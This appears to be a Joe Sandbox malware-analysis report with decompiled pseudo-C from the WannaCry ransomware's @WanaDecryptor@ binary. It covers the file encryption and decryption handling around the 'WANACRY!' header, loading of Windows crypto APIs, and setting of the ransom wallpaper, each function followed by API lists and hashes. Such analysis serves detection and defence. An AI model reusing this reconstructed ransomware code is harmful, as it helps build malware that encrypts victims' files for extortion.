                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t227;
                                  				_push(_t212);
                                  				_v624 = __ecx;
                                  				_t213 = _t212 | 0xffffffff;
                                  				_v620 = _t213;
                                  				_v608 = _t213;
                                  				_v48 = 0;
                                  				_v616 = 0;
                                  				_v580 = 0;
                                  				_v579 = 0;
                                  				_v575 = 0;
                                  				_v573 = 0;
                                  				_v612 = 0;
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				_v564 = 0;
                                  				_v8 = 0;
                                  				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                  				_v620 = _t159;
                                  				if(_t159 != _t213) {
                                  					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
                                  					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
                                  					__eflags = _t109;
                                  					if(_t109 == 0) {
                                  						L32:
                                  						_push(0xffffffff);
                                  						_push( &_v20);
                                  						goto L33;
                                  					} else {
                                  						__eflags = 0;
                                  						asm("repe cmpsd");
                                  						if(0 != 0) {
                                  							goto L32;
                                  						} else {
                                  							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
                                  							__eflags = _t113;
                                  							if(_t113 == 0) {
                                  								goto L32;
                                  							} else {
                                  								__eflags = _v616 - 0x100;
                                  								if(_v616 != 0x100) {
                                  									goto L32;
                                  								} else {
                                  									_t223 = _v624;
                                  									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
                                  									__eflags = _t115;
                                  									if(_t115 == 0) {
                                  										goto L32;
                                  									} else {
                                  										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
                                  										__eflags = _t116;
                                  										if(_t116 == 0) {
                                  											goto L32;
                                  										} else {
                                  											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
                                  											__eflags = _t118;
                                  											if(_t118 == 0) {
                                  												goto L32;
                                  											} else {
                                  												__eflags = _v612 - 3;
                                  												if(_v612 != 3) {
                                  													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                                  													_t216 = _t119;
                                  													_v608 = _t216;
                                  													__eflags = _t216 - 0xffffffff;
                                  													if(_t216 != 0xffffffff) {
                                  														_push( &_v48);
                                  														_push( &_v560);
                                  														_t51 = _t223 + 4; // 0x4
                                  														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
                                  														__eflags = _t122;
                                  														if(_t122 != 0) {
                                  															L22:
                                  															_t59 = _t223 + 0x54; // 0x54
                                  															_push(0x10);
                                  															_push(_v48);
                                  															_t196 =  *0x4213b0; // 0x4218b0
                                  															_push(_t196);
                                  															_push( &_v560);
                                  															E0040A150(_t59);
                                  															_v44 = _v572;
                                  															_v40 = _v568;
                                  															while(1) {
                                  																__eflags = _v40;
                                  																if(__eflags < 0) {
                                  																	break;
                                  																}
                                  																if(__eflags > 0) {
                                  																	L26:
                                  																	_t139 =  *(_t223 + 0x4d0);
                                  																	__eflags = _t139;
                                  																	if(_t139 == 0) {
                                  																		L28:
                                  																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
                                  																		__eflags = _t140;
                                  																		if(_t140 == 0) {
                                  																			L34:
                                  																			_push(0xffffffff);
                                  																			_push( &_v20);
                                  																			goto L33;
                                  																		} else {
                                  																			_t141 = _v36;
                                  																			__eflags = _t141;
                                  																			if(_t141 == 0) {
                                  																				goto L34;
                                  																			} else {
                                  																				_v44 = _v44 - _t141;
                                  																				asm("sbb dword [ebp-0x24], 0x0");
                                  																				_t76 = _t223 + 0x54; // 0x54
                                  																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
                                  																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
                                  																				__eflags = _t145;
                                  																				if(_t145 == 0) {
                                  																					goto L32;
                                  																				} else {
                                  																					__eflags = _v32 - _v36;
                                  																					if(_v32 == _v36) {
                                  																						continue;
                                  																					} else {
                                  																						goto L32;
                                  																					}
                                  																				}
                                  																			}
                                  																		}
                                  																	} else {
                                  																		__eflags =  *_t139;
                                  																		if( *_t139 != 0) {
                                  																			goto L32;
                                  																		} else {
                                  																			goto L28;
                                  																		}
                                  																	}
                                  																} else {
                                  																	__eflags = _v44;
                                  																	if(_v44 <= 0) {
                                  																		break;
                                  																	} else {
                                  																		goto L26;
                                  																	}
                                  																}
                                  																goto L41;
                                  															}
                                  															_push(0);
                                  															SetFilePointerEx(_t216, _v572, _v568, 0);
                                  															SetEndOfFile(_t216);
                                  															goto L36;
                                  														} else {
                                  															_push( &_v48);
                                  															_push( &_v560);
                                  															_t56 = _t223 + 0x2c; // 0x2c
                                  															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
                                  															__eflags = _t148;
                                  															if(_t148 != 0) {
                                  																_v564 = 1;
                                  																goto L22;
                                  															} else {
                                  																goto L20;
                                  															}
                                  														}
                                  													} else {
                                  														_push(_t119);
                                  														_push( &_v20);
                                  														goto L33;
                                  													}
                                  												} else {
                                  													CloseHandle(_t159);
                                  													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
                                  													_v620 = _t159;
                                  													__eflags = _t159 - 0xffffffff;
                                  													if(_t159 == 0xffffffff) {
                                  														goto L32;
                                  													} else {
                                  														SetFilePointer(_t159, 0xffff0000, 0, 2);
                                  														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
                                  														__eflags = _t152;
                                  														if(_t152 == 0) {
                                  															goto L32;
                                  														} else {
                                  															__eflags = _v36 - 0x10000;
                                  															if(_v36 != 0x10000) {
                                  																goto L32;
                                  															} else {
                                  																SetFilePointer(_t159, 0, 0, 0);
                                  																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
                                  																__eflags = _t155;
                                  																if(_t155 == 0) {
                                  																	L20:
                                  																	_push(0xffffffff);
                                  																	_push( &_v20);
                                  																	goto L33;
                                  																} else {
                                  																	__eflags = _v32 - 0x10000;
                                  																	if(_v32 != 0x10000) {
                                  																		goto L20;
                                  																	} else {
                                  																		SetFilePointer(_t159, 0xffff0000, 0, 2);
                                  																		SetEndOfFile(_t159);
                                  																		_t216 = _v608;
                                  																		L36:
                                  																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
                                  																		__eflags = _v612 - 3;
                                  																		if(_v612 == 3) {
                                  																			_t137 = CloseHandle(_t159) | 0xffffffff;
                                  																			__eflags = _t137;
                                  																			_v608 = _t137;
                                  																			_v620 = _t137;
                                  																			MoveFileW(_a4, _a8);
                                  																		}
                                  																		_t224 =  *(_t223 + 0x4d4);
                                  																		__eflags = _t224;
                                  																		if(_t224 != 0) {
                                  																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
                                  																		}
                                  																		_push(0xffffffff);
                                  																		_push( &_v20);
                                  																		L00413056();
                                  																		 *[fs:0x0] = _v20;
                                  																		return 1;
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_push(_t213);
                                  					_push( &_v20);
                                  					L33:
                                  					L00413056();
                                  					 *[fs:0x0] = _v20;
                                  					return 0;
                                  				}
                                  				L41:
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                  • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                  • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                  • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                  • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                  • CloseHandle.KERNEL32(00000000), ref: 00402234
                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                  • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                  • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                  • _local_unwind2.MSVCRT ref: 00402452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                  • String ID: WANACRY!
                                  • API String ID: 1586634678-1240840912
                                  • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                  • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
                                  				void* _t31;
                                  				int _t34;
                                  				int _t37;
                                  				intOrPtr _t39;
                                  				int _t42;
                                  				struct _WIN32_FIND_DATAA* _t54;
                                  				void* _t75;
                                  				struct _IO_FILE* _t76;
                                  				struct _WIN32_FIND_DATAA* _t79;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t83;
                                  				void* _t84;
                                  
                                  				_t54 = __ecx;
                                  				_t79 = __ecx;
                                  				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
                                  				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
                                  				 *(_t81 + 8) = _t31;
                                  				if(_t31 != 0xffffffff) {
                                  					goto L3;
                                  					L14:
                                  					_t75 =  *(_t81 + 0x14);
                                  					_t54 = _t81 + 0xdc;
                                  					if(FindNextFileA(_t75, _t54) != 0) {
                                  						L3:
                                  						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
                                  							asm("repne scasb");
                                  							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
                                  								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
                                  								_t81 = _t81 + 0xc;
                                  								if(_t34 >= 1) {
                                  									_t76 = fopen(_t81 + 0x108, "rb");
                                  									_t81 = _t81 + 8;
                                  									 *(_t81 + 0x18) = _t76;
                                  									if(_t76 != 0) {
                                  										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
                                  										_t82 = _t81 + 0x10;
                                  										if(_t37 == 1) {
                                  											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
                                  											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
                                  											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
                                  												if(_t39 != 0) {
                                  													 *((char*)(_t82 + 0x21)) = 0x5c;
                                  													 *((char*)(_t82 + 0x28)) = 0x5c;
                                  													E00401C30(_t60, _t39, _t82 + 0x22);
                                  													_t83 = _t82 + 8;
                                  													_push(_t83 + 0x20);
                                  													_push(0);
                                  													_push(0x143);
                                  												} else {
                                  													sprintf(_t82 + 0x20, "My Computer");
                                  													_t83 = _t82 + 8;
                                  													_push(_t83 + 0x20);
                                  													_push(0);
                                  													_push(0x14a);
                                  												}
                                  												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
                                  												_push(0x88);
                                  												L00412CEC();
                                  												_t84 = _t83 + 4;
                                  												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
                                  												_t82 = _t84 + 0xc;
                                  												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
                                  												_t76 =  *(_t82 + 0x18);
                                  												_t79 =  *((intOrPtr*)(_t82 + 0x10));
                                  											}
                                  										}
                                  										fclose(_t76);
                                  										_t81 = _t82 + 4;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L14;
                                  					} else {
                                  						FindClose(_t75);
                                  						return 1;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$My Computer$\$\
                                  • API String ID: 1476605332-298172004
                                  • Opcode ID: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                  • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                  • Opcode Fuzzy Hash: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                  • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404B70() {
                                  				_Unknown_base(*)()* _t9;
                                  				struct HINSTANCE__* _t20;
                                  
                                  				if( *0x4217c0 == 0) {
                                  					_t20 = LoadLibraryA("advapi32.dll");
                                  					if(_t20 == 0) {
                                  						L10:
                                  						return 0;
                                  					} else {
                                  						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
                                  						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
                                  						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
                                  						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
                                  						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
                                  						_t9 = GetProcAddress(_t20, "CryptGenKey");
                                  						 *0x4217d4 = _t9;
                                  						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
                                  							goto L10;
                                  						} else {
                                  							return 1;
                                  						}
                                  					}
                                  				} else {
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                  • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                  • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                  • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                  • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                  • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                  • API String ID: 2238633743-2459060434
                                  • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                  • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00407E80() {
                                  				void _v518;
                                  				short _v520;
                                  				short _v540;
                                  				void _v1038;
                                  				char _v1040;
                                  				long _v1060;
                                  				void _v1558;
                                  				short _v1560;
                                  				long _v1580;
                                  				int _t23;
                                  				short _t39;
                                  				void* _t42;
                                  				void* _t54;
                                  				void* _t55;
                                  
                                  				_t39 =  *0x42179c; // 0x0
                                  				_v1040 = _t39;
                                  				memset( &_v1038, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				_v1560 = _t39;
                                  				memset( &_v1558, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				_v520 = _t39;
                                  				memset( &_v518, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
                                  				_t23 = wcslen( &_v1060);
                                  				_t54 =  &_v1560 + 0x28;
                                  				if(_t23 != 0) {
                                  					_push(L"@WanaDecryptor@.bmp");
                                  					swprintf( &_v1580, L"%s\\%s",  &_v1060);
                                  					_t55 = _t54 + 0x10;
                                  					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
                                  					CopyFileW( &_v540, _t55, 0);
                                  					return SystemParametersInfoW(0x14, 0, _t55, 1);
                                  				} else {
                                  					return _t23;
                                  				}
                                  			}

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                  • wcslen.MSVCRT ref: 00407EF4
                                  • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                  • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                  • API String ID: 13424474-2236924158
                                  • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                  • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004067F0(void* __ecx) {
                                  				signed int _v84;
                                  				void* _v88;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				int _t16;
                                  				int _t21;
                                  				int _t22;
                                  				int _t37;
                                  				struct tagRECT* _t48;
                                  				void* _t56;
                                  
                                  				_t56 = __ecx;
                                  				_t16 = IsIconic( *(__ecx + 0x20));
                                  				if(_t16 == 0) {
                                  					L00412CBC();
                                  					return _t16;
                                  				} else {
                                  					_push(_t56);
                                  					L00412DD0();
                                  					asm("sbb eax, eax");
                                  					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
                                  					_t21 = GetSystemMetrics(0xb);
                                  					_t22 = GetSystemMetrics(0xc);
                                  					_t48 =  &_v104;
                                  					GetClientRect( *(_t56 + 0x20), _t48);
                                  					asm("cdq");
                                  					asm("cdq");
                                  					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
                                  					L00412DB8();
                                  					return _t37;
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                  • String ID:
                                  • API String ID: 1397574227-0
                                  • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                  • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
                                  				void* _v4;
                                  				void* _v12;
                                  				char _v16;
                                  				void* _v20;
                                  				char _v24;
                                  				struct HWND__* _v32;
                                  				WCHAR* _v36;
                                  				struct HWND__* _t90;
                                  				signed int* _t100;
                                  				signed int _t102;
                                  				signed int _t105;
                                  				signed int* _t109;
                                  				signed int _t113;
                                  				signed int _t114;
                                  				signed int _t121;
                                  				void* _t124;
                                  				signed int _t130;
                                  				signed int _t132;
                                  				signed int _t138;
                                  				signed int _t143;
                                  				signed int _t152;
                                  				signed int _t157;
                                  				void* _t185;
                                  				void* _t188;
                                  				signed int* _t191;
                                  				void* _t204;
                                  				signed int _t206;
                                  				struct HWND__* _t207;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t217;
                                  				void* _t218;
                                  				signed int _t221;
                                  				void* _t224;
                                  				signed int* _t226;
                                  				void* _t227;
                                  				void* _t228;
                                  
                                  				_t228 = _t227 - 0xc;
                                  				_t124 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  				}
                                  				_t206 = _a12;
                                  				_t185 = 0;
                                  				if(_t206 == 0) {
                                  					L26:
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  					_push(_t206);
                                  					_t90 = FindWindowW(0, _v36); // executed
                                  					_t207 = _t90;
                                  					if(_t207 != 0) {
                                  						_push(_t185);
                                  						ShowWindow(_t207, 5);
                                  						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
                                  						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                  						SetForegroundWindow(_t207);
                                  						SetFocus(_t207);
                                  						SetActiveWindow(_t207);
                                  						BringWindowToTop(_t207);
                                  						_t90 = _v32;
                                  						if(_t90 != 0) {
                                  							ExitProcess(0);
                                  						}
                                  					}
                                  					return _t90;
                                  				} else {
                                  					_t130 =  *(_t124 + 0x3cc);
                                  					if(_t206 % _t130 != 0) {
                                  						goto L26;
                                  					} else {
                                  						_t100 = _a16;
                                  						if(_t100 != 1) {
                                  							L13:
                                  							_a16 = _t185;
                                  							if(_t100 != 2) {
                                  								L23:
                                  								_t102 = _t206 / _t130;
                                  								_t188 = _a4;
                                  								_t221 = _a8;
                                  								if(_t102 <= 0) {
                                  									goto L11;
                                  								} else {
                                  									do {
                                  										_push(_t221);
                                  										_push(_t188);
                                  										E0040B0C0(_t124);
                                  										_t132 =  *(_t124 + 0x3cc);
                                  										_t188 = _t188 + _t132;
                                  										_t221 = _t221 + _t132;
                                  										_a8 = _a8 + 1;
                                  										_t105 = _t206 / _t132;
                                  									} while (_a8 < _t105);
                                  									return _t105;
                                  								}
                                  							} else {
                                  								_t102 = _t206 / _t130;
                                  								_t191 = _a8;
                                  								_t224 = _a4;
                                  								_a4 = _t191;
                                  								if(_t102 <= 0) {
                                  									goto L11;
                                  								} else {
                                  									while(1) {
                                  										_t50 = _t124 + 0x3f0; // 0x444
                                  										_push(_t191);
                                  										E0040ADC0(_t124);
                                  										_t109 = _t191;
                                  										if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                  											break;
                                  										}
                                  										_t211 = 0;
                                  										if( *(_t124 + 0x3cc) > 0) {
                                  											do {
                                  												 *_t109 =  *_t109 ^  *(_t211 + _t224);
                                  												_t109 =  &(_t109[0]);
                                  												_t211 = _t211 + 1;
                                  											} while (_t211 <  *(_t124 + 0x3cc));
                                  										}
                                  										_t212 = _t224;
                                  										_t56 = _t124 + 0x3f0; // 0x444
                                  										_t138 =  *(_t124 + 0x3cc) >> 2;
                                  										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
                                  										_t228 = _t228 + 0x18;
                                  										_t143 =  *(_t124 + 0x3cc);
                                  										_t114 = _t113 / _t143;
                                  										_t224 = _t224 + _t143;
                                  										_v4 = _v4 + _t143;
                                  										_t206 = _a8 + 1;
                                  										_a8 = _t206;
                                  										if(_t206 < _t114) {
                                  											_t191 = _v4;
                                  											continue;
                                  										} else {
                                  											return _t114;
                                  										}
                                  										goto L31;
                                  									}
                                  									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  									_t130 =  &_v24;
                                  									_push(0x41c9c0);
                                  									_push(_t130);
                                  									L004130FC();
                                  									goto L23;
                                  								}
                                  							}
                                  						} else {
                                  							_t102 = _t206 / _t130;
                                  							_t226 = _a8;
                                  							_a16 = 0;
                                  							if(_t102 <= 0) {
                                  								L11:
                                  								return _t102;
                                  							} else {
                                  								while(1) {
                                  									_push(_t226);
                                  									_push(_a4);
                                  									E0040B0C0(_t124);
                                  									_t100 = _t226;
                                  									if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                  										break;
                                  									}
                                  									_t217 = 0;
                                  									if( *(_t124 + 0x3cc) > 0) {
                                  										_t22 = _t124 - _t226 + 0x3f0; // 0x444
                                  										_t204 = _t22;
                                  										do {
                                  											 *_t100 =  *_t100 ^  *(_t204 + _t100);
                                  											_t100 =  &(_t100[0]);
                                  											_t217 = _t217 + 1;
                                  										} while (_t217 <  *(_t124 + 0x3cc));
                                  									}
                                  									_t218 = _v4;
                                  									_t27 = _t124 + 0x3f0; // 0x444
                                  									_t152 =  *(_t124 + 0x3cc) >> 2;
                                  									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
                                  									_t228 = _t228 + 0x18;
                                  									_t157 =  *(_t124 + 0x3cc);
                                  									_t102 = _t121 / _t157;
                                  									_t185 = _v4 + _t157;
